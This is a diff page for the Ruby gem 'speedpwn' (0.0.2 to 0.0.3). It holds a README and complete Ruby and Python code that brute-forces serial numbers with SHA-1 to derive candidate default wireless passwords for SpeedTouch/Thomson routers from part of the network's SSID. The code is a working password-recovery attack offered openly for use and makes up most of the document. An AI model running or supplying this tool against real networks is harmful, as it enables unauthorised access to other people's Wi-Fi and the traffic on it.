speedpwn 0.0.2 → 0.0.3
Sign up to get free protection for your applications and to get access to all the features.
- checksums.yaml +4 -4
- data/.gitignore +5 -0
- data/Gemfile +3 -0
- data/LICENSE +19 -0
- data/MANIFEST +14 -0
- data/README.md +49 -0
- data/Rakefile +7 -0
- data/lib/speedpwn.rb +6 -0
- data/lib/speedpwn/generator.rb +117 -0
- data/lib/speedpwn/version.rb +3 -0
- data/nostalgia/speedpwn.py +107 -0
- data/speedpwn.gemspec +20 -0
- data/task/manifest.rake +8 -0
- data/task/tag.rake +6 -0
- metadata +14 -1
checksums.yaml
CHANGED
@@ -1,7 +1,7 @@
|
|
1
1
|
---
|
2
2
|
SHA1:
|
3
|
-
metadata.gz:
|
4
|
-
data.tar.gz:
|
3
|
+
metadata.gz: 3e572c6d9ed7860eba6ac8028c72f231df72829c
|
4
|
+
data.tar.gz: 4c6b960438ca7aedab06e027aa5883db135140f0
|
5
5
|
SHA512:
|
6
|
-
metadata.gz:
|
7
|
-
data.tar.gz:
|
6
|
+
metadata.gz: 14456e0861ce92817d6b8e5c504111e3c30c9a7a65cc2766ba1da057b5f72d1acca9c499cd3010b9e5de49a786dadc35940f1f92d9124449fcbb6cc871600dab
|
7
|
+
data.tar.gz: 27b628c6c09cc57c74dc56b03025100c40fefaf35c409017d1bd03a21407b32941eeb4f0db70f36bcfe7dc589d524fa30b420ebe8f85aa3cd99ea449c20f4822
|
data/Gemfile
ADDED
data/LICENSE
ADDED
@@ -0,0 +1,19 @@
|
|
1
|
+
Copyright (c) 2013, Yorick Peterse
|
2
|
+
|
3
|
+
Permission is hereby granted, free of charge, to any person obtaining a copy
|
4
|
+
of this software and associated documentation files (the "Software"), to deal
|
5
|
+
in the Software without restriction, including without limitation the rights
|
6
|
+
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
|
7
|
+
copies of the Software, and to permit persons to whom the Software is
|
8
|
+
furnished to do so, subject to the following conditions:
|
9
|
+
|
10
|
+
The above copyright notice and this permission notice shall be included in
|
11
|
+
all copies or substantial portions of the Software.
|
12
|
+
|
13
|
+
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
|
14
|
+
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
|
15
|
+
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
|
16
|
+
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
|
17
|
+
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
|
18
|
+
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
|
19
|
+
THE SOFTWARE.
|
data/MANIFEST
ADDED
data/README.md
ADDED
@@ -0,0 +1,49 @@
|
|
1
|
+
# SpeedPwn
|
2
|
+
|
3
|
+
SpeedPwn is a Ruby application that can generate a list of possible passwords
|
4
|
+
for SpeedTouch/Thomson routers. BT Home hubs are not supported because they're
|
5
|
+
not used here in The Netherlands.
|
6
|
+
|
7
|
+
Originally I wrote a Python script (which can be found in
|
8
|
+
`nostalgia/speedpwn.py`) some time back in early 2009 to do this and I've used
|
9
|
+
it over the years. After using it for almost 4 years I decided it was time I'd
|
10
|
+
rewrite it in a decent way.
|
11
|
+
|
12
|
+
The algorithm used itself is nothing new and has been around since 2008. More
|
13
|
+
information about this can be found on the following webpages:
|
14
|
+
|
15
|
+
* <http://www.gnucitizen.org/blog/default-key-algorithm-in-thomson-and-bt-home-hub-routers/>
|
16
|
+
* <http://www.mentalpitstop.com/touchspeedcalc/calculate_speedtouch_default_wep_wpa_wpa2_password_by_ssid.html>
|
17
|
+
|
18
|
+
In plain English the algorithm for the default passwords can be described as
|
19
|
+
"Very dumb".
|
20
|
+
|
21
|
+
## Requirements
|
22
|
+
|
23
|
+
* Ruby 1.9.3 or newer
|
24
|
+
* OpenSSL
|
25
|
+
|
26
|
+
## Installation
|
27
|
+
|
28
|
+
Install it from RubyGems:
|
29
|
+
|
30
|
+
gem install speedpwn
|
31
|
+
|
32
|
+
Unlike other projects this one is not signed in any way. I consider it more of
|
33
|
+
a quick hobby/joke project and thus don't really want to bother with signing,
|
34
|
+
checksums, etc. Install at your own risk.
|
35
|
+
|
36
|
+
## Usage
|
37
|
+
|
38
|
+
Once installed, run it and pass the last 6 characters of the SSID:
|
39
|
+
|
40
|
+
speedpwn C28B9B
|
41
|
+
|
42
|
+
Generating the list of passwords can take a few minutes so go make some
|
43
|
+
tea/coffee while you wait for it to complete.
|
44
|
+
|
45
|
+
## License
|
46
|
+
|
47
|
+
All source code in this repository is licensed under the MIT license unless
|
48
|
+
specified otherwise. A copy of this license can be found in the file "LICENSE"
|
49
|
+
in the root directory of this repository.
|
data/Rakefile
ADDED
data/lib/speedpwn.rb
ADDED
@@ -0,0 +1,117 @@
|
|
1
|
+
module SpeedPwn
|
2
|
+
##
|
3
|
+
# The Generator class takes a SpeedTouch SSID part (the last 6 characters)
|
4
|
+
# and returns an Array containing the possible default passwords for it. This
|
5
|
+
# code is based on the following resources:
|
6
|
+
#
|
7
|
+
# * http://www.gnucitizen.org/blog/default-key-algorithm-in-thomson-and-bt-home-hub-routers/
|
8
|
+
# * http://www.mentalpitstop.com/touchspeedcalc/calculate_speedtouch_default_wep_wpa_wpa2_password_by_ssid.html
|
9
|
+
#
|
10
|
+
# Note that unlike other tools this particular one *only* supports SpeedTouch
|
11
|
+
# routers since BT Home hubs are not used in The Netherlands.
|
12
|
+
#
|
13
|
+
# @!attribute [r] identifier
|
14
|
+
# @return [String]
|
15
|
+
#
|
16
|
+
class Generator
|
17
|
+
attr_reader :identifier
|
18
|
+
|
19
|
+
##
|
20
|
+
# @return [Array]
|
21
|
+
#
|
22
|
+
YEARS = ('04'..(Time.now.strftime('%y'))).to_a
|
23
|
+
|
24
|
+
##
|
25
|
+
# @return [Array]
|
26
|
+
#
|
27
|
+
WEEKS = ('1'..'52').to_a
|
28
|
+
|
29
|
+
##
|
30
|
+
# @return [Array]
|
31
|
+
#
|
32
|
+
CHARACTERS = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'.chars.to_a
|
33
|
+
|
34
|
+
##
|
35
|
+
# @param [String] identifier The last 6 characters of the SSID.
|
36
|
+
#
|
37
|
+
def initialize(identifier)
|
38
|
+
@identifier = identifier
|
39
|
+
@digest = OpenSSL::Digest::SHA1.new
|
40
|
+
end
|
41
|
+
|
42
|
+
##
|
43
|
+
# Sets the block to call whenever a week (= batch) has been processed.
|
44
|
+
#
|
45
|
+
# @param [Proc] block
|
46
|
+
#
|
47
|
+
def finish_batch(&block)
|
48
|
+
@finish_batch = block
|
49
|
+
end
|
50
|
+
|
51
|
+
##
|
52
|
+
# Generates the passwords and returns them as an Array of Strings.
|
53
|
+
#
|
54
|
+
# @return [Array]
|
55
|
+
#
|
56
|
+
def generate
|
57
|
+
passwords = []
|
58
|
+
batch_size = character_combinations.size
|
59
|
+
|
60
|
+
YEARS.each do |year|
|
61
|
+
WEEKS.each do |week|
|
62
|
+
character_combinations.each do |combo|
|
63
|
+
found = generate_password(year, week, combo)
|
64
|
+
|
65
|
+
passwords << found if found
|
66
|
+
end
|
67
|
+
|
68
|
+
@finish_batch.call(batch_size) if @finish_batch
|
69
|
+
end
|
70
|
+
end
|
71
|
+
|
72
|
+
return passwords
|
73
|
+
end
|
74
|
+
|
75
|
+
##
|
76
|
+
# Returns the amount of iterations to run.
|
77
|
+
#
|
78
|
+
# @return [Numeric]
|
79
|
+
#
|
80
|
+
def size
|
81
|
+
return YEARS.size * WEEKS.size * character_combinations.size
|
82
|
+
end
|
83
|
+
|
84
|
+
alias_method :count, :size
|
85
|
+
|
86
|
+
private
|
87
|
+
|
88
|
+
##
|
89
|
+
# @param [String] year
|
90
|
+
# @param [String] week
|
91
|
+
# @param [String] combo
|
92
|
+
# @return [String]
|
93
|
+
#
|
94
|
+
def generate_password(year, week, combo)
|
95
|
+
found = nil
|
96
|
+
serial = "CP#{year}#{week}#{combo}".upcase
|
97
|
+
hash = @digest.hexdigest(serial).upcase
|
98
|
+
|
99
|
+
if hash[-6..-1] == identifier
|
100
|
+
found = hash[0..9]
|
101
|
+
end
|
102
|
+
|
103
|
+
return found
|
104
|
+
end
|
105
|
+
|
106
|
+
##
|
107
|
+
# @return [Array]
|
108
|
+
#
|
109
|
+
def character_combinations
|
110
|
+
@combinations ||= CHARACTERS.permutation(3).map do |group|
|
111
|
+
group.map { |char| char.ord.to_s(16) }.join('')
|
112
|
+
end
|
113
|
+
|
114
|
+
return @combinations
|
115
|
+
end
|
116
|
+
end # Generator
|
117
|
+
end # SpeedPwn
|
@@ -0,0 +1,107 @@
|
|
1
|
+
#!/usr/bin/env python
|
2
|
+
##
|
3
|
+
# Author: Yorick Peterse
|
4
|
+
# Website: http://www.yorickpeterse.com/
|
5
|
+
# Description: SpeedTouch Key is a Python script that generates (possible) keys
|
6
|
+
# for a SpeedTouch Wireless network that uses the default SSID/password
|
7
|
+
# combination based on the serial number.
|
8
|
+
#
|
9
|
+
# Imports
|
10
|
+
from hashlib import sha1
|
11
|
+
from multiprocessing import Process
|
12
|
+
import sys
|
13
|
+
import os
|
14
|
+
import itertools
|
15
|
+
|
16
|
+
# =============================================
|
17
|
+
# ============= 1: Initialization =============
|
18
|
+
# =============================================
|
19
|
+
|
20
|
+
# Fancy boot screen
|
21
|
+
print "==================================\n==== SpeedTouch Key Generator ====\n==================================\n"
|
22
|
+
|
23
|
+
# SSID part
|
24
|
+
ssid_part = raw_input("Enter the last 6 characters of the SSID: ")
|
25
|
+
ssid_part = ssid_part.upper().strip()
|
26
|
+
|
27
|
+
# Validate the SSID part
|
28
|
+
if len(ssid_part) <> 6:
|
29
|
+
print "ERROR: The specified part of the SSID is invalid, it should be exactly 6 characters long"
|
30
|
+
sys.exit()
|
31
|
+
else:
|
32
|
+
pass
|
33
|
+
|
34
|
+
# Required variables in order to generate the serial number
|
35
|
+
production_years = ['04', '05','06','07','08','09','10', '11']
|
36
|
+
production_weeks = range(1,53)
|
37
|
+
|
38
|
+
# Required in order to generate the unit number
|
39
|
+
chars_string = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'
|
40
|
+
list_items = []
|
41
|
+
unit_numbers = []
|
42
|
+
|
43
|
+
# Convert the string to a list
|
44
|
+
for char in chars_string:
|
45
|
+
list_items.append(char)
|
46
|
+
|
47
|
+
# Dict containing the final results
|
48
|
+
processed_years = []
|
49
|
+
password_dict = {}
|
50
|
+
|
51
|
+
# Get all possible combinations
|
52
|
+
combinations = itertools.permutations(list_items,3)
|
53
|
+
|
54
|
+
# =============================================
|
55
|
+
# ========= 2: Combination generation =========
|
56
|
+
# =============================================
|
57
|
+
|
58
|
+
# Loop through each combination, convert it to a string and add it to the list
|
59
|
+
for combination in combinations:
|
60
|
+
# Convert to string and to hex
|
61
|
+
to_append = '%s%s%s' % (combination[0],combination[1],combination[2])
|
62
|
+
to_append = to_append.encode('hex')
|
63
|
+
|
64
|
+
# Append to the list, but only if it isn't already in there
|
65
|
+
unit_numbers.append(to_append)
|
66
|
+
|
67
|
+
# =============================================
|
68
|
+
# ============ 3: Main application ============
|
69
|
+
# =============================================
|
70
|
+
|
71
|
+
# Generator function
|
72
|
+
def generator(year,weeks,units):
|
73
|
+
# Loop through each week
|
74
|
+
for week in weeks:
|
75
|
+
|
76
|
+
# Loop through each possible unit number
|
77
|
+
for unit in units:
|
78
|
+
# Create the serial number
|
79
|
+
serial = 'CP%s%s%s' % (year,week,unit)
|
80
|
+
serial = serial.upper()
|
81
|
+
|
82
|
+
# Hash the serial using SHA-1
|
83
|
+
serial_hash = sha1(serial).hexdigest().upper()
|
84
|
+
|
85
|
+
# Get the last bit and compare it to the input, print the key if it matches
|
86
|
+
last_bit = serial_hash[-6:]
|
87
|
+
password = serial_hash[:10]
|
88
|
+
|
89
|
+
if last_bit == ssid_part:
|
90
|
+
# Add the password to the dictionary
|
91
|
+
print
|
92
|
+
print " * Possible password: %s" % (password)
|
93
|
+
print " Year: %s" % (year)
|
94
|
+
print " Week: %s" % (week)
|
95
|
+
print " Combo: %s" % (unit)
|
96
|
+
print " Serial: %s" % (serial)
|
97
|
+
|
98
|
+
sys.exit()
|
99
|
+
|
100
|
+
# Main part, this is where most of the work is done
|
101
|
+
# Loop through each year and create a new process
|
102
|
+
if __name__ == '__main__':
|
103
|
+
print "Generating possible passwords..."
|
104
|
+
|
105
|
+
for year in production_years:
|
106
|
+
p = Process(target=generator, args=(year,production_weeks,unit_numbers))
|
107
|
+
p.start()
|
data/speedpwn.gemspec
ADDED
@@ -0,0 +1,20 @@
|
|
1
|
+
require File.expand_path('../lib/speedpwn/version', __FILE__)
|
2
|
+
|
3
|
+
Gem::Specification.new do |gem|
|
4
|
+
gem.name = 'speedpwn'
|
5
|
+
gem.version = SpeedPwn::VERSION
|
6
|
+
gem.author = 'Yorick Peterse'
|
7
|
+
gem.email = 'yorickpeterse@gmail.com'
|
8
|
+
gem.summary = 'Generates possible passwords for SpeedTouch/Thomson routers.'
|
9
|
+
gem.description = gem.summary
|
10
|
+
gem.executables = ['speedpwn']
|
11
|
+
gem.license = 'MIT'
|
12
|
+
gem.has_rdoc = 'yard'
|
13
|
+
|
14
|
+
gem.required_ruby_version = '>= 1.9.3'
|
15
|
+
|
16
|
+
gem.files = File.read(File.expand_path('../MANIFEST', __FILE__)).split("\n")
|
17
|
+
|
18
|
+
gem.add_dependency 'slop'
|
19
|
+
gem.add_dependency 'progress_bar'
|
20
|
+
end
|
data/task/manifest.rake
ADDED
data/task/tag.rake
ADDED
metadata
CHANGED
@@ -1,7 +1,7 @@
|
|
1
1
|
--- !ruby/object:Gem::Specification
|
2
2
|
name: speedpwn
|
3
3
|
version: !ruby/object:Gem::Version
|
4
|
-
version: 0.0.
|
4
|
+
version: 0.0.3
|
5
5
|
platform: ruby
|
6
6
|
authors:
|
7
7
|
- Yorick Peterse
|
@@ -45,7 +45,20 @@ executables:
|
|
45
45
|
extensions: []
|
46
46
|
extra_rdoc_files: []
|
47
47
|
files:
|
48
|
+
- .gitignore
|
49
|
+
- Gemfile
|
50
|
+
- LICENSE
|
51
|
+
- MANIFEST
|
52
|
+
- README.md
|
53
|
+
- Rakefile
|
48
54
|
- bin/speedpwn
|
55
|
+
- lib/speedpwn.rb
|
56
|
+
- lib/speedpwn/generator.rb
|
57
|
+
- lib/speedpwn/version.rb
|
58
|
+
- nostalgia/speedpwn.py
|
59
|
+
- speedpwn.gemspec
|
60
|
+
- task/manifest.rake
|
61
|
+
- task/tag.rake
|
49
62
|
homepage:
|
50
63
|
licenses:
|
51
64
|
- MIT
|